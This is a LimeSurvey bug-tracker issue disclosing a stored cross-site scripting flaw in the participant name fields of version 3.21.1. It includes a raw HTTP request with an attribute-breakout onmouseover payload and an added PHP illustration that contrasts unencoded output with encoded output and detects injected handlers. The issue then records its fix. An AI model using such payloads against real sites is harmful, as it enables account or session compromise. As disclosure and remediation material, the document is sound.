View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update | 
|---|---|---|---|---|---|
| 15680 | Bug reports | LimeSurvey Website | public | 2019-12-19 14:24 | 2020-05-04 09:44 | 
| Reporter | misheljava | Assigned To | |||
| Priority | none | Severity | partial_block | ||
| Status | closed | Resolution | fixed | ||
| Product Version | 3.21.1 | ||||
| Fixed in Version | 3.21.2 | ||||
| Summary | 15680: LimeSurvey 3.21.1 Cross Site Scripting Stored | ||||
| Description | • Title: LimeSurvey 3.21.1 Cross Site Scripting (XSS) Stored (2 instances)  | ||||
| Steps To Reproduce | List of vulnerable parameters: Steps to reproduce: Step 2 - Add a new survey participant. Insert the following payloads into the First name & Last name fields and click Save (see second screenshot). Step 3 - Now click on Save and you should see a message saying Success (see screenshot 3). Now click on 'Browse survey participant'. Step 4 - Once you browse to survey participants, you will see the new participant has been added with your payload as firstname and lastname (see screenshot 4). Step 5 - Now click on the Edit symbol to edit your participant (see screenshot 4). Once the edit window pops up you will notice your XSS payload rendering in the browser (see screenshots 5 and 6); screenshot 7 shows that the user-supplied input was not sanitized and that there is no output encoding. | ||||
| Additional Information | Due to the size of the server response I will only include the HTTP request and a snippet of the response showing there is no output encoding in place. HTTP request with vulnerable parameters and XSS payloads: POST /limesurvey3.21.1/index.php/admin/tokens/sa/addnew/surveyid/686776/tokenid HTTP/1.1 YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D&completed-switch=0&completed-date=N&completed=N&firstname=Fname%22onmouseover%3D%22alert%28%27Fname%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F&lastname=Lname%22onmouseover%3D%22alert%28%27Lname%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F&token=&language=en&email=tter%40tes.cpom&emailstatus=+OK+&sent-switch=0&sent-date=N&sent=N&remind-switch=0&remind-date=N&remindersent=N&usesleft=1&validfrom=&validuntil=&subaction=inserttoken&sid=686776 Second HTTP request, with the XSS payloads in the response (see screenshot 7): GET /limesurvey3.21.1/index.php/admin/tokens/sa/edit/iSurveyId/686776/iTokenId/6/ajax/true?YII_CSRF_TOKEN=WkJDTFA4RDdmbUJvMVhVS0VNdXFaQzNCa2g5UnE1dnJRvylcV9_gUYN_cIoQdadDDRfuRrsY_3lxPsqhxgrh3A%3D%3D HTTP/1.1 | ||||
| Tags | No tags attached. | ||||
| Attached Files | |||||
| Bug heat | 10 | ||||
| Complete LimeSurvey version number (& build) | limesurvey3.21.1+191210 | ||||
| I will donate to the project if issue is resolved | No | ||||
| Browser | Chrome & Firefox | ||||
| Database type & version | DB Server version: 10.4.6-MariaDB Database client version: libmysql - mysqlnd 5.0.12-dev - 20150407 | ||||
| Server OS (if known) | |||||
| Webserver software & version (if known) | |||||
| PHP Version | PHP version: 7.3.9 | ||||
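Added illustration, not code from the report or from LimeSurvey: a stand-alone PHP script that takes the two vulnerable parameters from the POST body in the report, renders them into a text input the way a view that echoes the stored value raw would, and beside it the output-encoded rendering that Yii's CHtml::encode() performs (htmlspecialchars with ENT_QUOTES). The input markup is a hypothetical stand-in for the fields in tokenform.php, and hasInjectedHandler() is a helper written only for this example. Decoded, each payload closes the value attribute, appends an onmouseover handler and a style that stretches the element over the whole viewport, so moving the mouse anywhere on the edit page fires the alert; after encoding, the quotes never leave the attribute and the same string is inert.

```php
<?php
// Added example (not LimeSurvey code). Shows the attribute break-out behind
// issue 15680 and the effect of output encoding on the same stored value.
// The request body is a trimmed copy of the POST body from the report; the
// <input> markup is a hypothetical stand-in for the real tokenform.php fields.

declare(strict_types=1);

// Trimmed copy of the reporter's POST body: only the two vulnerable parameters.
const POSTED_BODY =
    'firstname=Fname%22onmouseover%3D%22alert%28%27Fname%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F'
    . '&lastname=Lname%22onmouseover%3D%22alert%28%27Lname%27%29%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%229e2ad%2F%2F';

/** Parse the form body the same way PHP fills $_POST (percent-decoding included). */
function parseBody(string $body): array
{
    parse_str($body, $fields);
    return $fields;
}

/** Vulnerable rendering: the stored value is echoed straight into the attribute. */
function renderRaw(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

/**
 * Hardened rendering. htmlspecialchars() with ENT_QUOTES is what Yii 1's
 * CHtml::encode() wraps, so " becomes &quot; and the attribute cannot be closed.
 */
function renderEncoded(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="'
        . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Helper for this example: does the markup contain a quote-terminated
 * event-handler attribute? The payload uses no space before onmouseover,
 * relying on lenient browser attribute parsing, so the check looks for
 * a literal double quote immediately followed by on<name>=".
 */
function hasInjectedHandler(string $html): bool
{
    return (bool) preg_match('/"on[a-z]+\s*=\s*"/i', $html);
}

$fields = parseBody(POSTED_BODY);
foreach (['firstname', 'lastname'] as $name) {
    $raw  = renderRaw($name, $fields[$name]);
    $safe = renderEncoded($name, $fields[$name]);
    echo "raw:     $raw\n";
    echo "         injected handler? " . (hasInjectedHandler($raw) ? 'yes' : 'no') . "\n";
    echo "encoded: $safe\n";
    echo "         injected handler? " . (hasInjectedHandler($safe) ? 'yes' : 'no') . "\n\n";
}
```

Run it with `php` from the command line; no web server is needed. The raw rendering reports an injected handler for both fields, the encoded rendering for neither. The same encoding has to be applied at every place the stored first and last name are echoed into markup (the participant list as well as the edit form), because the value is persisted once and rendered in several views.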
| Confirm the issue. No CHTML usage (or encode) in https://github.com/LimeSurvey/LimeSurvey/blob/d8072e535cc209f281b12f57a5572e741108b6b5/application/views/admin/token/tokenform.php#L150 |
| PS: since some surveys can allow registration, I think this XSS is publicly accessible in surveys with registration allowed. |
| Fix committed to master branch: http://bugs.limesurvey.org/plugin.php?page=Source/view&id=29293 |
| @misheljava Thanks a lot for these very useful and well-documented issue reports! |
| Fixed in Release 4.0.0+200116 |
| Date Modified | Username | Field | Change | 
|---|---|---|---|
| 2019-12-19 14:24 | misheljava | New Issue | |
| 2019-12-19 14:24 | misheljava | File Added: image.png | |
| 2019-12-19 14:24 | misheljava | File Added: image-2.png | |
| 2019-12-19 14:24 | misheljava | File Added: image-3.png | |
| 2019-12-19 14:24 | misheljava | File Added: image-4.png | |
| 2019-12-19 14:24 | misheljava | File Added: image-5.png | |
| 2019-12-19 14:24 | misheljava | File Added: image-6.png | |
| 2019-12-19 14:24 | misheljava | File Added: image-7.png | |
| 2019-12-19 14:58 | cdorin | View Status | public => private | 
| 2019-12-19 14:58 | cdorin | Description Updated | |
| 2019-12-19 14:58 | cdorin | Steps to Reproduce Updated | |
| 2019-12-19 14:58 | cdorin | Additional Information Updated | |
| 2019-12-19 15:06 | cdorin | Assigned To | => markusfluer | 
| 2019-12-19 15:06 | cdorin | Status | new => assigned | 
| 2019-12-19 15:17 | DenisChenu | Note Added: 55087 | |
| 2019-12-19 15:17 | DenisChenu | Note Edited: 55087 | |
| 2019-12-19 15:18 | DenisChenu | Note Added: 55088 | |
| 2019-12-19 15:22 | DenisChenu | Issue Monitored: DenisChenu | |
| 2019-12-19 16:24 | | Changeset attached | => LimeSurvey master 0a7bdfa1 |
| 2019-12-19 16:24 | | Note Added: 55095 | |
| 2019-12-19 16:24 | | Resolution | open => fixed |
| 2019-12-19 16:25 | | Status | assigned => resolved |
| 2019-12-19 16:25 | | Fixed in Version | => 3.21.2 |
| 2019-12-19 17:06 | Mazi | Note Added: 55097 | |
| 2020-02-03 14:53 | lime_release_bot | Note Added: 55649 | |
| 2020-02-03 14:53 | lime_release_bot | Status | resolved => closed | 
| 2020-05-04 09:44 | ollehar | View Status | private => public | 
| 2021-08-02 17:18 | guest | Bug heat | 8 => 10 |